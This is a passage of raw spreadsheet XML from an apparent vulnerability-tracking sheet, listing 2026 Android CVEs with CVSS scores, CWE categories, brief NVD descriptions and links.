t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28607</t></is></c></row><row r="419"><c r="A419" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B419" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C419" s="5" t="inlineStr"><is><t>CVE-2026-28611</t></is></c><c r="D419" s="5" t="n"><v>7.8</v></c><c r="E419" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F419" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G419" s="5" t="inlineStr" /><c r="H419" s="5" t="n"><v>0.001</v></c><c r="I419" s="5" t="inlineStr" /><c r="J419" s="5" t="inlineStr" /><c r="K419" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L419" s="5" t="inlineStr" /><c r="M419" s="5" t="inlineStr" /><c r="N419" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O419" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P419" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q419" s="5" t="inlineStr" /><c r="R419" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S419" s="5" t="inlineStr"><is><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is></c><c r="T419" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28611</t></is></c></row><row r="420"><c r="A420" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B420" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C420" s="5" t="inlineStr"><is><t>CVE-2026-28612</t></is></c><c r="D420" s="5" t="n"><v>7.8</v></c><c r="E420" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F420" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G420" s="5" t="inlineStr" /><c r="H420" s="5" t="n"><v>0.001</v></c><c r="I420" s="5" t="inlineStr" /><c r="J420" s="5" t="inlineStr" /><c r="K420" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L420" s="5" t="inlineStr" /><c r="M420" s="5" t="inlineStr" /><c r="N420" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O420" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P420" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q420" s="5" t="inlineStr" /><c r="R420" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S420" s="5" t="inlineStr"><is><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is></c><c r="T420" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28612</t></is></c></row><row r="421"><c r="A421" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B421" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C421" s="5" t="inlineStr"><is><t>CVE-2026-28614</t></is></c><c r="D421" s="5" t="n"><v>7.8</v></c><c r="E421" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F421" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G421" s="5" t="inlineStr" /><c r="H421" s="5" t="n"><v>0.001</v></c><c r="I421" s="5" t="inlineStr" /><c r="J421" s="5" t="inlineStr" /><c r="K421" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L421" s="5" t="inlineStr" /><c r="M421" s="5" t="inlineStr" /><c r="N421" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O421" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P421" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q421" s="5" t="inlineStr" /><c r="R421" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S421" s="5" t="inlineStr"><is><t>In onCreate of SlicePermissionActivity.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T421" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28614</t></is></c></row><row r="422"><c r="A422" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B422" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C422" s="5" t="inlineStr"><is><t>CVE-2026-28616</t></is></c><c r="D422" s="5" t="n"><v>7.8</v></c><c r="E422" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F422" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G422" s="5" t="inlineStr" /><c r="H422" s="5" t="n"><v>0.001</v></c><c r="I422" s="5" t="inlineStr" /><c r="J422" s="5" t="inlineStr" /><c r="K422" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L422" s="5" t="inlineStr" /><c r="M422" s="5" t="inlineStr" /><c r="N422" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O422" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P422" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q422" s="5" t="inlineStr" /><c r="R422" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S422" s="5" t="inlineStr"><is><t>In Setup Wizard, there is a possible way to force connection to a malicious network due to confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T422" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28616</t></is></c></row><row r="423"><c r="A423" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B423" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C423" s="5" t="inlineStr"><is><t>CVE-2026-28620</t></is></c><c r="D423" s="5" t="n"><v>7.8</v></c><c r="E423" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F423" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G423" s="5" t="inlineStr" /><c r="H423" s="5" t="n"><v>0.001</v></c><c r="I423" s="5" t="inlineStr" /><c r="J423" s="5" t="inlineStr" /><c r="K423" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L423" s="5" t="inlineStr" /><c r="M423" s="5" t="inlineStr" /><c r="N423" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O423" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P423" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q423" s="5" t="inlineStr" /><c r="R423" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S423" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible unauthorized URI access due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T423" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28620</t></is></c></row><row r="424"><c r="A424" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B424" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C424" s="5" t="inlineStr"><is><t>CVE-2026-28624</t></is></c><c r="D424" s="5" t="n"><v>7.8</v></c><c r="E424" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F424" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G424" s="5" t="inlineStr" /><c r="H424" s="5" t="n"><v>0.001</v></c><c r="I424" s="5" t="inlineStr" /><c r="J424" s="5" t="inlineStr" /><c r="K424" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L424" s="5" t="inlineStr" /><c r="M424" s="5" t="inlineStr" /><c r="N424" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O424" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P424" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q424" s="5" t="inlineStr" /><c r="R424" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S424" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible read/write access to files without the proper permissions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T424" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28624</t></is></c></row><row r="425"><c r="A425" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B425" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C425" s="5" t="inlineStr"><is><t>CVE-2026-28631</t></is></c><c r="D425" s="5" t="n"><v>7.8</v></c><c r="E425" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F425" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G425" s="5" t="inlineStr" /><c r="H425" s="5" t="n"><v>0.001</v></c><c r="I425" s="5" t="inlineStr" /><c r="J425" s="5" t="inlineStr" /><c r="K425" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L425" s="5" t="inlineStr" /><c r="M425" s="5" t="inlineStr" /><c r="N425" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O425" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P425" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q425" s="5" t="inlineStr" /><c r="R425" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="S425" s="5" t="inlineStr"><is><t>In buildMiniResolver of IntentForwarderActivity.java, there is a possible consent bypass due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T425" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28631</t></is></c></row><row r="426"><c r="A426" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B426" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C426" s="5" t="inlineStr"><is><t>CVE-2026-28634</t></is></c><c r="D426" s="5" t="n"><v>7.8</v></c><c r="E426" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F426" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G426" s="5" t="inlineStr" /><c r="H426" s="5" t="n"><v>0.001</v></c><c r="I426" s="5" t="inlineStr" /><c r="J426" s="5" t="inlineStr" /><c r="K426" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L426" s="5" t="inlineStr" /><c r="M426" s="5" t="inlineStr" /><c r="N426" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O426" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P426" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q426" s="5" t="inlineStr" /><c r="R426" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S426" s="5" t="inlineStr"><is><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is></c><c r="T426" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28634</t></is></c></row><row r="427"><c r="A427" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B427" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C427" s="5" t="inlineStr"><is><t>CVE-2026-28636</t></is></c><c r="D427" s="5" t="n"><v>7.8</v></c><c r="E427" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F427" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G427" s="5" t="inlineStr" /><c r="H427" s="5" t="n"><v>0.001</v></c><c r="I427" s="5" t="inlineStr" /><c r="J427" s="5" t="inlineStr" /><c r="K427" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L427" s="5" t="inlineStr" /><c r="M427" s="5" t="inlineStr" /><c r="N427" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O427" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P427" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q427" s="5" t="inlineStr" /><c r="R427" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S427" s="5" t="inlineStr"><is><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is></c><c r="T427" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28636</t></is></c></row><row r="428"><c r="A428" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B428" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C428" s="5" t="inlineStr"><is><t>CVE-2026-28639</t></is></c><c r="D428" s="5" t="n"><v>7.8</v></c><c r="E428" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F428" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G428" s="5" t="inlineStr" /><c r="H428" s="5" t="n"><v>0.001</v></c><c r="I428" s="5" t="inlineStr" /><c r="J428" s="5" t="inlineStr" /><c r="K428" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L428" s="5" t="inlineStr" /><c r="M428" s="5" t="inlineStr" /><c r="N428" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O428" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P428" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q428" s="5" t="inlineStr" /><c r="R428" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S428" s="5" t="inlineStr"><is><t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible out of bounds write due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T428" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28639</t></is></c></row><row r="429"><c r="A429" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B429" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C429" s="5" t="inlineStr"><is><t>CVE-2026-28642</t></is></c><c r="D429" s="5" t="n"><v>7.8</v></c><c r="E429" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F429" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G429" s="5" t="inlineStr" /><c r="H429" s="5" t="n"><v>0.001</v></c><c r="I429" s="5" t="inlineStr" /><c r="J429" s="5" t="inlineStr" /><c r="K429" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L429" s="5" t="inlineStr" /><c r="M429" s="5" t="inlineStr" /><c r="N429" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O429" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P429" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q429" s="5" t="inlineStr" /><c r="R429" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S429" s="5" t="inlineStr"><is><t>In executeRequest of ActivityStarter.java, there is a possible background activity launch due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T429" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28642</t></is></c></row><row r="430"><c r="A430" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B430" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C430" s="5" t="inlineStr"><is><t>CVE-2026-28644</t></is></c><c r="D430" s="5" t="n"><v>7.8</v></c><c r="E430" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F430" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G430" s="5" t="inlineStr" /><c r="H430" s="5" t="n"><v>0.001</v></c><c r="I430" s="5" t="inlineStr" /><c r="J430" s="5" t="inlineStr" /><c r="K430" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L430" s="5" t="inlineStr" /><c r="M430" s="5" t="inlineStr" /><c r="N430" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O430" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P430" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q430" s="5" t="inlineStr" /><c r="R430" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S430" s="5" t="inlineStr"><is><t>In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T430" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28644</t></is></c></row><row r="431"><c r="A431" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B431" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C431" s="5" t="inlineStr"><is><t>CVE-2026-28650</t></is></c><c r="D431" s="5" t="n"><v>7.8</v></c><c r="E431" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F431" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G431" s="5" t="inlineStr" /><c r="H431" s="5" t="n"><v>0.001</v></c><c r="I431" s="5" t="inlineStr" /><c r="J431" s="5" t="inlineStr" /><c r="K431" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L431" s="5" t="inlineStr" /><c r="M431" s="5" t="inlineStr" /><c r="N431" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O431" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P431" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q431" s="5" t="inlineStr" /><c r="R431" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S431" s="5" t="inlineStr"><is><t>In setHiddenWhileSuspended of WindowState.java, there is a possible overlay bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T431" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28650</t></is></c></row><row r="432"><c r="A432" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B432" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C432" s="5" t="inlineStr"><is><t>CVE-2026-28653</t></is></c><c r="D432" s="5" t="n"><v>7.8</v></c><c r="E432" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F432" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G432" s="5" t="inlineStr" /><c r="H432" s="5" t="n"><v>0.001</v></c><c r="I432" s="5" t="inlineStr" /><c r="J432" s="5" t="inlineStr" /><c r="K432" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L432" s="5" t="inlineStr" /><c r="M432" s="5" t="inlineStr" /><c r="N432" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O432" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P432" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q432" s="5" t="inlineStr" /><c r="R432" s="5" t="inlineStr"><is><t>CWE-1190, CWE-787</t></is></c><c r="S432" s="5" t="inlineStr"><is><t>In multiple functions of rw_t3t.cc, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T432" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28653</t></is></c></row><row r="433"><c r="A433" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B433" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C433" s="5" t="inlineStr"><is><t>CVE-2026-28655</t></is></c><c r="D433" s="5" t="n"><v>7.8</v></c><c r="E433" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F433" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G433" s="5" t="inlineStr" /><c r="H433" s="5" t="n"><v>0.001</v></c><c r="I433" s="5" t="inlineStr" /><c r="J433" s="5" t="inlineStr" /><c r="K433" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L433" s="5" t="inlineStr" /><c r="M433" s="5" t="inlineStr" /><c r="N433" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O433" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P433" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q433" s="5" t="inlineStr" /><c r="R433" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S433" s="5" t="inlineStr"><is><t>In multiple functions of RemoteViews.java, there is a possible background activity launch bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T433" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28655</t></is></c></row><row r="434"><c r="A434" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B434" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C434" s="5" t="inlineStr"><is><t>CVE-2026-28657</t></is></c><c r="D434" s="5" t="n"><v>7.8</v></c><c r="E434" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F434" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G434" s="5" t="inlineStr" /><c r="H434" s="5" t="n"><v>0.001</v></c><c r="I434" s="5" t="inlineStr" /><c r="J434" s="5" t="inlineStr" /><c r="K434" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L434" s="5" t="inlineStr" /><c r="M434" s="5" t="inlineStr" /><c r="N434" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O434" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P434" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q434" s="5" t="inlineStr" /><c r="R434" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S434" s="5" t="inlineStr"><is><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is></c><c r="T434" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28657</t></is></c></row><row r="435"><c r="A435" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B435" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C435" s="5" t="inlineStr"><is><t>CVE-2026-28658</t></is></c><c r="D435" s="5" t="n"><v>7.8</v></c><c r="E435" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F435" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G435" s="5" t="inlineStr" /><c r="H435" s="5" t="n"><v>0.001</v></c><c r="I435" s="5" t="inlineStr" /><c r="J435" s="5" t="inlineStr" /><c r="K435" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L435" s="5" t="inlineStr" /><c r="M435" s="5" t="inlineStr" /><c r="N435" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O435" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P435" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q435" s="5" t="inlineStr" /><c r="R435" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S435" s="5" t="inlineStr"><is><t>In findMetaAuthUid of AccountsDb.java, there is a possible frp bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T435" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28658</t></is></c></row><row r="436"><c r="A436" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B436" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C436" s="5" t="inlineStr"><is><t>CVE-2026-28659</t></is></c><c r="D436" s="5" t="n"><v>7.8</v></c><c r="E436" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F436" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G436" s="5" t="inlineStr" /><c r="H436" s="5" t="n"><v>0.001</v></c><c r="I436" s="5" t="inlineStr" /><c r="J436" s="5" t="inlineStr" /><c r="K436" s="5" t="inlineStr"><is><t>google:android_xr</t></is></c><c r="L436" s="5" t="inlineStr" /><c r="M436" s="5" t="inlineStr" /><c r="N436" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O436" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P436" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q436" s="5" t="inlineStr" /><c r="R436" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S436" s="5" t="inlineStr"><is><t>In MicroXR Blobstore, there is a possible way to access other app's files due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T436" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28659</t></is></c></row><row r="437"><c r="A437" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B437" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C437" s="5" t="inlineStr"><is><t>CVE-2026-28663</t></is></c><c r="D437" s="5" t="n"><v>7.8</v></c><c r="E437" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F437" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G437" s="5" t="inlineStr" /><c r="H437" s="5" t="n"><v>0.001</v></c><c r="I437" s="5" t="inlineStr" /><c r="J437" s="5" t="inlineStr" /><c r="K437" s="5" t="inlineStr" /><c r="L437" s="5" t="inlineStr" /><c r="M437" s="5" t="inlineStr" /><c r="N437" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O437" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P437" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q437" s="5" t="inlineStr" /><c r="R437" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S437" s="5" t="inlineStr"><is><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is></c><c r="T437" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28663</t></is></c></row><row r="438"><c r="A438" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B438" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C438" s="5" t="inlineStr"><is><t>CVE-2026-28664</t></is></c><c r="D438" s="5" t="n"><v>7.8</v></c><c r="E438" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F438" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G438" s="5" t="inlineStr" /><c r="H438" s="5" t="n"><v>0.001</v></c><c r="I438" s="5" t="inlineStr" /><c r="J438" s="5" t="inlineStr" /><c r="K438" s="5" t="inlineStr" /><c r="L438" s="5" t="inlineStr" /><c r="M438" s="5" t="inlineStr" /><c r="N438" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O438" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P438" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q438" s="5" t="inlineStr" /><c r="R438" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S438" s="5" t="inlineStr"><is><t>In WriteImageToDisk of runtime_image.cc, there is a possible file tampering due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T438" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28664</t></is></c></row><row r="439"><c r="A439" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B439" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C439" s="5" t="inlineStr"><is><t>CVE-2026-28668</t></is></c><c r="D439" s="5" t="n"><v>7.8</v></c><c r="E439" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F439" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G439" s="5" t="inlineStr" /><c r="H439" s="5" t="n"><v>0.001</v></c><c r="I439" s="5" t="inlineStr" /><c r="J439" s="5" t="inlineStr" /><c r="K439" s="5" t="inlineStr" /><c r="L439" s="5" t="inlineStr" /><c r="M439" s="5" t="inlineStr" /><c r="N439" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O439" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P439" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q439" s="5" t="inlineStr" /><c r="R439" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S439" s="5" t="inlineStr"><is><t>In LimitRealloc of malloc_limit.cpp, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T439" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28668</t></is></c></row><row r="440"><c r="A440" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B440" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C440" s="5" t="inlineStr"><is><t>CVE-2026-45515</t></is></c><c r="D440" s="5" t="n"><v>7.8</v></c><c r="E440" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F440" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G440" s="5" t="inlineStr" /><c r="H440" s="5" t="n"><v>0.001</v></c><c r="I440" s="5" t="inlineStr" /><c r="J440" s="5" t="inlineStr" /><c r="K440" s="5" t="inlineStr" /><c r="L440" s="5" t="inlineStr" /><c r="M440" s="5" t="inlineStr" /><c r="N440" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O440" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P440" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c 